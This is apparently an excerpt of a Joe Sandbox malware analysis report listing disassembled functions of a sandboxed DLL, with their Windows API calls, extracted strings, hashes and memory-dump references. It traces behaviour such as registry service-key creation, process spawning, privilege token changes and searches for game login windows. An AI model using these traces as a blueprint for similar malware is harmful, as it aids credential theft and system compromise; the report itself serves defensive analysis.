                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                      • Instruction ID: 3476fa7090815ab603ce4ec9be7b6209102f942efadac0d502ebb8da107f5b9b
                                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                      • Instruction Fuzzy Hash: 69C19073C0EAB38A8379816D425952FEAA26FD174533AC3E29CF43F78DE1269D0181D1
                                                                                                                                      Function 69EC2310 Relevance: .1, Instructions: 76COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                      • Instruction ID: db29c5aeafa113929a4cb49b7f59fe2d5b42ec0513334b1385f90b845eaef1f1
                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                      • Instruction Fuzzy Hash: 8E11D677244043C3D701896DC6B47AEA796FBE5338B386375D0F14B756D223D1579902
                                                                                                                                      Function 69E86F40 Relevance: 110.4, APIs: 3, Strings: 60, Instructions: 132libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNEL32 ref: 69E86F96
                                                                                                                                      • GetProcAddress.KERNEL32 ref: 69E87059
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 69E870FD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                      • String ID: .$2$3$4$4$4$4$6$6$6$6$D$F$F$K$R$R$R$W$W$W$W$asiD$c$c$d$d$d$i$i$i$i$i$l$l$l$n$n$n$o$o$o$o$o$o$r$r$r$r$s$s$s$t$t$t$v$w$w$w$w
                                                                                                                                      • API String ID: 2238633743-3101056358
                                                                                                                                      • Opcode ID: ce40dfa95936c8648804e944020965bbd7f36087b0d46d3068e843a2532d50dc
                                                                                                                                      • Instruction ID: bb5165618b93533dd032e291b3833e25427866bda0c72fa7c81709979abc8097
                                                                                                                                      • Opcode Fuzzy Hash: ce40dfa95936c8648804e944020965bbd7f36087b0d46d3068e843a2532d50dc
                                                                                                                                      • Instruction Fuzzy Hash: 0551BB2150D3C0D9E312D668948875FFFD61FA3648F88499EE1C84A282D2FB9618C777
                                                                                                                                      Function 69EA5DF0 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 401COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA5E19
                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 69EA5E2E
                                                                                                                                      • wsprintfA.USER32 ref: 69EA5E4F
                                                                                                                                      • GetTickCount.KERNEL32 ref: 69EA5E5B
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 69EA5E68
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69EA5EB8
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69EA5ECC
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA5ED3
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69EA5EEB
                                                                                                                                      • OutputDebugStringA.KERNEL32(shout is empty), ref: 69EA5EFF
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA5F06
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$Current__wfopen_s$CountDirectoryProcessTick_memsetwsprintf
                                                                                                                                      • String ID: %s\$%s_MAP_89826$(Li$(Ni$(Ni$C:\789.txt$C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A9F7A9DD\A815rppmj.dll$C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\B671819D97E4\84AEHJG8C.dll$C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\E71620\712EVTPSM.dll$C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\F03D5C\9605A212x.dll$C:\pl.txt$CreateProcessmapWq: GamesType : %d, userType : %d$H1i$H1i$H3i$H3i$shout is empty${4872-11202-91}
                                                                                                                                      • API String ID: 1111341681-2356859441
                                                                                                                                      • Opcode ID: 87e273de90ff8373c306a4de63054e6487d7e9f1aca3c5ed41d5154fc46293f7
                                                                                                                                      • Instruction ID: 3929b30badf5b82fc4dc446600c796298cdf948505adcc61e5eb6a92556ac6c3
                                                                                                                                      • Opcode Fuzzy Hash: 87e273de90ff8373c306a4de63054e6487d7e9f1aca3c5ed41d5154fc46293f7
                                                                                                                                      • Instruction Fuzzy Hash: 33D15679508341AFC310CB648D49EEFB7A9AF99308F74C91DF4988F240EB35D5098B92
                                                                                                                                      Function 69E86599 Relevance: 87.7, APIs: 15, Strings: 35, Instructions: 224registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _sprintf.LIBCMT ref: 69E865BB
                                                                                                                                      • RegOpenKeyExA.ADVAPI32 ref: 69E86666
                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 69E86688
                                                                                                                                      • _memset.LIBCMT ref: 69E866A0
                                                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 69E866D9
                                                                                                                                      • _strncmp.LIBCMT ref: 69E867EA
                                                                                                                                      • _strncmp.LIBCMT ref: 69E8681A
                                                                                                                                      • _strncmp.LIBCMT ref: 69E8684A
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E86936
                                                                                                                                      • _memset.LIBCMT ref: 69E8694A
                                                                                                                                      • _sprintf.LIBCMT ref: 69E8697A
                                                                                                                                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 69E869A4
                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 69E869C0
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 69E869CF
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E869D6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close_strncmp$Open_memset_sprintf$CreateEnumInfoQuery
                                                                                                                                      • String ID: C$C$C$ControlSet00%d$E$M$S$S$S$S$System\%s\Services\%s$T$Y$e$e$e$l$l$n$n$n$o$o$o$o$r$r$r$r$t$t$t$t$t$u
                                                                                                                                      • API String ID: 1163434922-1667650837
                                                                                                                                      • Opcode ID: e9e58f1aa8d6426cbe2b58f57837d0e35332693a8fb0643f1af85b56268921ff
                                                                                                                                      • Instruction ID: f69af8d5866e51299bca32ba63a1dc8e242d0d648bab2dedbd60b4bcea3dd652
                                                                                                                                      • Opcode Fuzzy Hash: e9e58f1aa8d6426cbe2b58f57837d0e35332693a8fb0643f1af85b56268921ff
                                                                                                                                      • Instruction Fuzzy Hash: E791397150C3C09EE332CB648944BABBBE9AB96708F144D5EE5CD47242D7B99608C763
                                                                                                                                      Function 69E8659E Relevance: 87.7, APIs: 15, Strings: 35, Instructions: 223registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _sprintf.LIBCMT ref: 69E865BB
                                                                                                                                      • RegOpenKeyExA.ADVAPI32 ref: 69E86666
                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 69E86688
                                                                                                                                      • _memset.LIBCMT ref: 69E866A0
                                                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 69E866D9
                                                                                                                                      • _strncmp.LIBCMT ref: 69E867EA
                                                                                                                                      • _strncmp.LIBCMT ref: 69E8681A
                                                                                                                                      • _strncmp.LIBCMT ref: 69E8684A
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E86936
                                                                                                                                      • _memset.LIBCMT ref: 69E8694A
                                                                                                                                      • _sprintf.LIBCMT ref: 69E8697A
                                                                                                                                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 69E869A4
                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 69E869C0
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 69E869CF
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E869D6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close_strncmp$Open_memset_sprintf$CreateEnumInfoQuery
                                                                                                                                      • String ID: C$C$C$ControlSet00%d$E$M$S$S$S$S$System\%s\Services\%s$T$Y$e$e$e$l$l$n$n$n$o$o$o$o$r$r$r$r$t$t$t$t$t$u
                                                                                                                                      • API String ID: 1163434922-1667650837
                                                                                                                                      • Opcode ID: 7a302e9070aaa7babbf3829eeefcddcbc931fc296e0baf8abb35d3d13b8632d8
                                                                                                                                      • Instruction ID: c6b5152252bd2c3f70515d470303b99094512a4fb5c1f77cbde748e2f1739f80
                                                                                                                                      • Opcode Fuzzy Hash: 7a302e9070aaa7babbf3829eeefcddcbc931fc296e0baf8abb35d3d13b8632d8
                                                                                                                                      • Instruction Fuzzy Hash: 9591397150C3C09EE332CB648944BABBBE9AB96708F144D5EE5CD47242D7B99608C763
                                                                                                                                      Function 69EA33F0 Relevance: 86.1, APIs: 28, Strings: 21, Instructions: 358windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 69EA3413
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69EA344F
                                                                                                                                      • OutputDebugStringA.KERNEL32(_strnicmp : WTWindow login window), ref: 69EA346D
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA3474
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69EA34D7
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,TTreeView,00000000), ref: 69EA350E
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,TfrmGameList,00000000), ref: 69EA3520
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,SysTreeView32,00000000), ref: 69EA3532
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,TRzBmpButton,00000000), ref: 69EA3544
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,TRzTreeView,00000000), ref: 69EA3556
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,TVirtualStringTree,00000000), ref: 69EA3568
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,ComboBox,00000000), ref: 69EA357A
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,TComboBox,00000000), ref: 69EA358C
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,_EL_Label,00000000), ref: 69EA359E
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,TfrmRegister,00000000), ref: 69EA35B0
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,Internet Explorer_Server,00000000), ref: 69EA35C2
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,_EL_RgnButton,00000000), ref: 69EA35D4
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,Internet Explorer_Hidden,00000000), ref: 69EA35E6
                                                                                                                                      • FindWindowExA.USER32(00000000,00000000,TForm_LoginBK,00000000), ref: 69EA35F8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$Find$DebugOutputString__wfopen_s$Visible
                                                                                                                                      • String ID: C:\pl.txt$ComboBox$FindWindowEx : login window$Internet Explorer_Hidden$Internet Explorer_Server$IsPorcWithTargetClass : login window$SysTreeView32$TComboBox$TForm_LoginBK$TFrmMain$TRzBmpButton$TRzCheckBox$TRzTreeView$TTreeView$TVirtualStringTree$TfrmGameList$TfrmRegister$_EL_Label$_EL_RgnButton$_strnicmp : WTWindow login window$count is : %d
                                                                                                                                      • API String ID: 1517189602-266419103
                                                                                                                                      • Opcode ID: 4dd6e8708b9fdc4a918716737d8f1662d0aa419bcc96a9697fb2456c8d6da951
                                                                                                                                      • Instruction ID: 20ca7ca55ebe9d16d6cb6f9b69e069c0090be0e2a84cc0ef05f7fba3eef92a17
                                                                                                                                      • Opcode Fuzzy Hash: 4dd6e8708b9fdc4a918716737d8f1662d0aa419bcc96a9697fb2456c8d6da951
                                                                                                                                      • Instruction Fuzzy Hash: 1BA1A6A9A0420576E70192255E42F3FB6AC5F89B5CFB0A42DFC05EA256FF34E80445F3
                                                                                                                                      Function 69E811A0 Relevance: 56.3, APIs: 26, Strings: 6, Instructions: 298sleepprocessCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 69E811D9
                                                                                                                                        • Part of subcall function 69E9D690: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?,69E811E6), ref: 69E9D69E
                                                                                                                                        • Part of subcall function 69E9D690: LookupPrivilegeValueA.ADVAPI32 ref: 69E9D6C4
                                                                                                                                        • Part of subcall function 69E9D690: CloseHandle.KERNEL32(?), ref: 69E9D6D3
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E811F9
                                                                                                                                      • OutputDebugStringA.KERNEL32(updebug(GetCurrentProcess())==FALSE), ref: 69E8120C
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E81217
                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 69E8122C
                                                                                                                                      • _memset.LIBCMT ref: 69E81244
                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 69E81270
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 69E81289
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 69E81290
                                                                                                                                      • _memset.LIBCMT ref: 69E812DC
                                                                                                                                      • ShellExecuteExA.SHELL32 ref: 69E8131D
                                                                                                                                      • _memset.LIBCMT ref: 69E81334
                                                                                                                                      • _memset.LIBCMT ref: 69E81359
                                                                                                                                      • _strrchr.LIBCMT ref: 69E81374
                                                                                                                                      • _strncpy.LIBCMT ref: 69E81393
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E813AA
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69E813C3
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E813CA
                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 69E813F5
                                                                                                                                      • _memset.LIBCMT ref: 69E8140A
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 69E8142C
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 69E81433
                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 69E81454
                                                                                                                                      • _malloc.LIBCMT ref: 69E8146B
                                                                                                                                      • _memset.LIBCMT ref: 69E81482
                                                                                                                                      • _strncpy.LIBCMT ref: 69E814EF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
